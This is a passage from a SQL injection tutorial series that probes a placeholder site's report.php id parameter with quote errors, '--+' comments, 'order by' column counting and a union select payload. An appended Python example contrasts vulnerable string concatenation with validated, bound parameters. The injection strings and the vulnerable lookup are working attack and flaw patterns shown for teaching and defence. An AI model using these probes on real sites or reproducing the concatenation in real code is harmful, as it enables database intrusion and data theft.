http://fakesite.com/report.php?id=23' : Error "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1"
http://fakesite.com/report.php?id=23" : Error "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"' at line 1"
http://fakesite.com/report.php?id=23 and true : As we remember from Part 2, while testing the internal query, if an error comes with both single and double quote then the internal query could be integer based, so now we test for that. It gives output
http://fakesite.com/report.php?id=23 and false : No output


So as we learnt from Part 2, we tested this URL and understood that it's an integer based query. We can make an assumption like below:
Select * from anytablename where id=<Input>


Now let us try and see which comment type we can use. As we already know that the input is integer type and is not enclosed by any single or double quote, we will be testing for integer type injection only and won't have to close any single or double quote this time.

Query : Output
http://fakesite.com/report.php?id=23` : Backtick type commenting (error)
http://fakesite.com/report.php?id=23-- : Error or no output
http://fakesite.com/report.php?id=23--+ : Same output as 23 was giving
http://fakesite.com/report.php?id=23 or true--+ : No error but some different output


As we learnt while testing for the comment type, we can understand from the above output that --+ can be used here as the comment. So, as we can see, whatever we inject in the URL gets injected into the query. Our next task starts here: we need to use a union select statement so that we can manipulate the output and print whatever we want to extract about and from the database. But to use union select we must know the number of columns used in the query. For that we will use 'order by', as we know that if we give order by a number larger than the number of columns in the query, it will throw an error.

URL injection | Internal query | Output
http://fakesite.com/report.php?id=23 order by 10--+ | Select * from tablename where id=23 order by 10 | Error (then reduce)
http://fakesite.com/report.php?id=23 order by 1--+ | Select * from tablename where id=23 order by 1 | Working (then increase)
http://fakesite.com/report.php?id=23 order by 5--+ | Select * from tablename where id=23 order by 5 | Working (then increase)
http://fakesite.com/report.php?id=23 order by 8--+ | Select * from tablename where id=23 order by 8 | Error (then reduce)
http://fakesite.com/report.php?id=23 order by 6--+ | Select * from tablename where id=23 order by 6 | Error (then reduce)


We already know that 5 worked, so we don't need to reduce and test again. We can simply understand that 5 is the last number that worked. Now we can use a union select query, which will be the next phase of our injection. That's all for this part. We will continue our journey into SQLi in the next part.
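Both this part and the Basic Union Based Injection post above rest on one application flaw: the id parameter is pasted into the SQL text, so "order by N" and "union select" become part of the statement. The following is an added example, not code from either post, that builds report.php's lookup both ways against an in-memory SQLite table (the posts discuss MySQL; SQLite is used so the example runs offline, and its error messages differ in wording from the MySQL ones quoted above). The constructed table has the five columns the posts assume, so the same "order by 5" succeeds, "order by 6" fails, and a five-column union is accepted, while the hardened version rejects every one of those inputs before they reach the parser. The table, its rows and the function names make_db, lookup_vulnerable, vulnerable_error and lookup_hardened are invented for the example.

```python
"""report.php's lookup built two ways, run against an in-memory SQLite table.

Added example, not code from the posts (which discuss MySQL); SQLite is used
so it runs offline, and the table is constructed with the five columns the
tutorials assume. lookup_vulnerable() pastes the id parameter into the SQL
text, which is the flaw the order-by and union probes depend on;
lookup_hardened() insists on an integer and binds it as a parameter.
"""
import sqlite3
from typing import List, Optional, Tuple

SELECT = "SELECT id, title, body, author, created FROM report WHERE id="


def make_db() -> sqlite3.Connection:
    """Constructed sample data: two rows, five columns."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE report (id INTEGER PRIMARY KEY, title TEXT, "
                 "body TEXT, author TEXT, created TEXT)")
    conn.executemany("INSERT INTO report VALUES (?, ?, ?, ?, ?)", [
        (23, "Q1 summary", "internal figures", "emily", "2015-03-03"),
        (24, "Q2 plan", "draft", "deniel", "2015-03-04"),
    ])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, id_param: str) -> List[Tuple]:
    """String concatenation: whatever follows the number becomes SQL."""
    return conn.execute(SELECT + id_param).fetchall()


def vulnerable_error(conn: sqlite3.Connection, id_param: str) -> Optional[str]:
    """The database error text a probe provokes, or None when it ran cleanly.

    The tutorials read these errors to learn the column count; an application
    that shows them to the user is handing that signal over.
    """
    try:
        lookup_vulnerable(conn, id_param)
    except sqlite3.OperationalError as exc:
        return str(exc)
    return None


def lookup_hardened(conn: sqlite3.Connection, id_param: str) -> Optional[List[Tuple]]:
    """Validate, then bind: the parameter can never be parsed as SQL."""
    try:
        report_id = int(id_param)
    except ValueError:
        return None            # reject rather than guess; log this at the edge
    return conn.execute(SELECT + "?", (report_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    for probe in ("23", "23 order by 5--+", "23 order by 6--+",
                  "-23 union select 1,2,3,4,5--+"):
        outcome = vulnerable_error(db, probe) or lookup_vulnerable(db, probe)
        print(f"{probe!r:34} vulnerable -> {outcome}")
        print(f"{'':34} hardened   -> {lookup_hardened(db, probe)}")
```

Two things are worth noticing when running it. The hardened path fails closed on a non-integer id instead of silently returning no rows, which keeps the rejected input available to log as a probe. And the "-23" trick the posts use to blank the real row does nothing once the value is bound as an integer: the query simply finds no record, and there is no second SELECT for a union to attach to.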

 Author : Zenodermus Javanicus & http://securityidiots.com/